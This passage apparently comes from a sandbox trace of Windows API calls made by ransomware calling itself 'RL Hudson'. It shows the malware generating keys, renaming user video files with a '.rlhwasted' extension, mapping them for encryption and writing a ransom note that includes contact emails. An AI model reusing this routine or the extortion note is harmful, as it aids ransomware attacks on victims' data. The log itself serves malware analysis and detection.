PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Ofvydg6dGqsZxUS5B/6syzRT/JpQD4kIv0TFbT4KePRoP425PPFTvXFXTJKlM30l\r\nPEGsMMfTlXxcBmhQewO1GDzWoxhlF0bEMIxDxOhAighX21WnDxLuaOq15tjg0yif\r\nhkUvVstlNhnlol3RqlNRRYWMModHu1xGpYQbDa6KD/94roBCoGYJm27B7KEOl2a6\r\nN1rdv1mBknrADTAnIfUGndPJQRZwuL8IDifWaHFMvSNbgzkR60yEj7AF8oJxPC2y\r\n6/SLhgbYkOQWE2q/V2LD+seXBTfuqj2NHkOFI2hab16OKBrfmAngOaLmiCyHIXvC\r\nttf96qzhAsE0ObtDHJL0i4pnBLoVUy0k31JG2cXWHNlxD6ClMs0KkqfIWZHFvdk1\r\nQyZFveGjd+ItqbZpwZncgPhE+1ColGysFyWKH4jnX30VLFgcIhcF0sDdoxnaxfXf\r\nfA59OqW43w7Lz8MBL6idBvtQq4UimkDoqEPcKuJ4yXXcRuCTiNuZuZCDig7FKT8H\r\nqqzBD3+oFP26LiPtFizncLhkXAzvEBTIodozZG1ghHUhSoG5PPf0XA3z09ZnVvPF\r\nYQhOnGO39i3m3ZLKOxaMmbkIPLFZgWOM1C9KvF3EKRftGim3blPIJIbMn1Moj3a0\r\nCK3KORYHevqTteWQnRKIjZ/vIi66EDoRluAY4VwuvPE=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.612] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x7166c8 | out: hHeap=0x6b0000) returned 1 [0197.612] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0197.612] SetEndOfFile (hFile=0x104) returned 1 [0197.614] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.614] CloseHandle (hObject=0x104) returned 1 [0197.616] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0197.616] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x7159e0 | out: hHeap=0x6b0000) returned 1 [0197.616] _aulldvrm () returned 0x0 [0197.616] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0197.617] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0197.617] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0197.617] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\xUIjiX2muD.avi") returned 121 [0197.617] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2fc) returned 0x6e7988 [0197.617] lstrcpyW (in: lpString1=0x6e7a7a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.617] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.617] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0197.618] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0197.618] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0197.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\xUIjiX2muD.avi.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\xuijix2mud.avi.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0197.619] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0197.620] SetEndOfFile (hFile=0x104) returned 1 [0197.620] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.620] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.620] lstrcpyW (in: lpString1=0x6e7a7a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.620] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\xUIjiX2muD.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\xuijix2mud.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\xUIjiX2muD.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\xuijix2mud.avi.rlhwasted")) returned 1 [0197.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\xUIjiX2muD.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\xuijix2mud.avi.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0197.621] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0197.622] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x4147 [0197.622] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4147) returned 0x6a0000 [0197.622] CloseHandle (hObject=0x124) returned 1 [0197.625] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0197.625] CloseHandle (hObject=0x128) returned 1 [0197.625] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0197.625] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0197.626] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0197.626] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0197.626] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0197.627] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0197.627] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0197.684] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0197.684] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0197.684] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.684] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]YIJEvnuYwj4AnPheMQqqksldiYvMjDT7FPjbG6l2D1IvuRyR87ykiso41zOoYLPL\r\nZoHcLLq0IdOdIgBQiUYuGZkVuPxR0SLyn77No6oRs+CPoLP2CayM9lfpORvaV9ly\r\nrl+kXKTIirJl1di2imohTLXVGmGjwXN18k+ceI+HJpnLgDrhlKFBLhF+iwlBPdTF\r\nO4/WPvp1xVY9K2alvTuJldXg+ULImSlGq9XvFAg9l6dUT/Pj2lOYuiqfTVIKTr7W\r\n4PoaOdpCjN9Y6Trh79uxhKeUOIsjuvtgHVZy/jb9z8RDiu9T8XcAh7SVvIF79rEX\r\nfO7zbx7Kj4t7IPdfVBw1pHc3dt1kYH6DLf6r8iFiBX68u2cOhRFvBItbFd/K4Ift\r\nn18cK049jjpGRDkvabjj+V9NT1Z+C3iXNgjv7IvNWRfHJ+YwqCbm9FGQ4flVCqQr\r\n7cVQUN3kFru9MpzxPz3yymJulfBfNpjuabDT8jiqNatUvQ0CSNfnsF/6fVVOAaxj\r\nytUSnfNo21rAwqOfzJ8IkcL7Sv1a6bsLNnxh0wrx6Z9t1J+EIks9eaqYZyf/v2Sx\r\nDLhJO00/B7/KMC8aLoj2QjGhsF985IEzc3R4eJzRX5ncYAI3WWXyNbIs4eaKiskG\r\n9BH6y02yL2KaCmrFAGCpsJIo/qKqd2FqaLjvMHQ/g3s=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.684] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0197.684] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0197.685] SetEndOfFile (hFile=0x104) returned 1 [0197.687] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.687] CloseHandle (hObject=0x104) returned 1 [0197.692] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0197.693] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715b38 | out: hHeap=0x6b0000) returned 1 [0197.693] _aulldvrm () returned 0x0 [0197.693] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0197.694] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0197.694] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.694] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\sc-TmIuTTHwS8WY1KTL_\\8izqR SIPbJ.avi") returned 124 [0197.694] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x302) returned 0x6e7988 [0197.694] lstrcpyW (in: lpString1=0x6e7a80, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.694] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.694] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0197.695] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0197.695] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.695] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\sc-TmIuTTHwS8WY1KTL_\\8izqR SIPbJ.avi.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\sc-tmiutthws8wy1ktl_\\8izqr sipbj.avi.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0197.695] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0197.696] SetEndOfFile (hFile=0x104) returned 1 [0197.697] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.697] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.697] lstrcpyW (in: lpString1=0x6e7a80, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.697] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\sc-TmIuTTHwS8WY1KTL_\\8izqR SIPbJ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\sc-tmiutthws8wy1ktl_\\8izqr sipbj.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\sc-TmIuTTHwS8WY1KTL_\\8izqR SIPbJ.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\sc-tmiutthws8wy1ktl_\\8izqr sipbj.avi.rlhwasted")) returned 1 [0198.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\sc-TmIuTTHwS8WY1KTL_\\8izqR SIPbJ.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\sc-tmiutthws8wy1ktl_\\8izqr sipbj.avi.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0198.095] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0198.095] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xe2d9 [0198.095] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe2d9) returned 0x6a0000 [0198.095] CloseHandle (hObject=0x124) returned 1 [0198.100] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0198.101] CloseHandle (hObject=0x12c) returned 1 [0198.101] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0198.101] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0198.102] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0198.102] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0198.102] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0198.103] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0198.103] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0198.148] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0198.149] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0198.149] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0198.149] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]NexyYWB8573lh0njkQTk/caXUceV6uJUzC6xR9XLKqCY1bBiuqa3NccyQnX8P5l8\r\nSHidBhw/dVtMnx6sdjE92iD5PSRVhXBauzt/7d7EN+vvsgo0R30S83l34VmbXyv5\r\naTdEFDEx6AZFNcze56PTPkfHBEthc7BkjXHZwwZfEe0coIEICFlafCV2Q1Hjk+GB\r\nqz0Agpe0mJbsQVuqQnu9tJ2USIbp+l2+ASKCpGT3puBnyTwAhleA5zit9LbOy2Xw\r\nsZxxgYKB42JDCmaCdh0/1/bB/93iow2oGkpAdeeF5NgkDMbRRQpgD8vGxh12kBIk\r\nx1+mEHCP7pC9mrWdNXc07jQFaKOA+lE6/CYoeHb1fwdsWXzAbuqNUKWp4PY7vSBG\r\nY4wpHMjd5cP4RHzqEuOyu2fTHo7Z7wax3IAbYOTjl8gBRuVSiWJHZJNU6/MysjLy\r\nEmWhi87AyIFbc6zzHP6Z9tgPhMMdv26f1FjywSOdQeUyhUKEZwMX6PQNcuqulLCe\r\nSJq166Fsh/rW/F1FSDlAspJcsnnmXKhpnzTsFLSZSHTQvh2xUq2gvh9vAYJbVsYX\r\ns2HsK+za+qdzFOLZnCbwCi7fuKBUzgtjRPQyaexW0r0I5+QBYJcbG8oNRWOnbJSy\r\nN96YYEvzBnKUry5kiIqv5n0pt0c8CWnT+/g01fs1I5s=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.149] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.149] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0198.149] SetEndOfFile (hFile=0x104) returned 1 [0198.152] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0198.152] CloseHandle (hObject=0x104) returned 1 [0198.154] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.154] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x716c90 | out: hHeap=0x6b0000) returned 1 [0198.155] _aulldvrm () returned 0x0 [0198.155] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0198.156] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0198.156] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.156] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\gNhLVJwRFb9OA.swf") returned 95 [0198.156] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c8) returned 0x6e8978 [0198.156] lstrcpyW (in: lpString1=0x6e8a36, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.156] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0198.156] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0198.157] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0198.157] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\gNhLVJwRFb9OA.swf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\gnhlvjwrfb9oa.swf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0198.158] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0198.159] SetEndOfFile (hFile=0x104) returned 1 [0198.159] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.160] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0198.160] lstrcpyW (in: lpString1=0x6e8a36, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.160] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\gNhLVJwRFb9OA.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\gnhlvjwrfb9oa.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\gNhLVJwRFb9OA.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\gnhlvjwrfb9oa.swf.rlhwasted")) returned 1 [0198.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\gNhLVJwRFb9OA.swf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\gnhlvjwrfb9oa.swf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0198.161] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0198.161] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x14a96 [0198.161] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14a96) returned 0xb00000 [0198.161] CloseHandle (hObject=0x12c) returned 1 [0198.168] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0198.168] CloseHandle (hObject=0x124) returned 1 [0198.168] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0198.168] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0198.169] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0198.169] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0198.170] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0198.170] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0198.171] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0198.187] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e7988 [0198.187] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0198.187] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 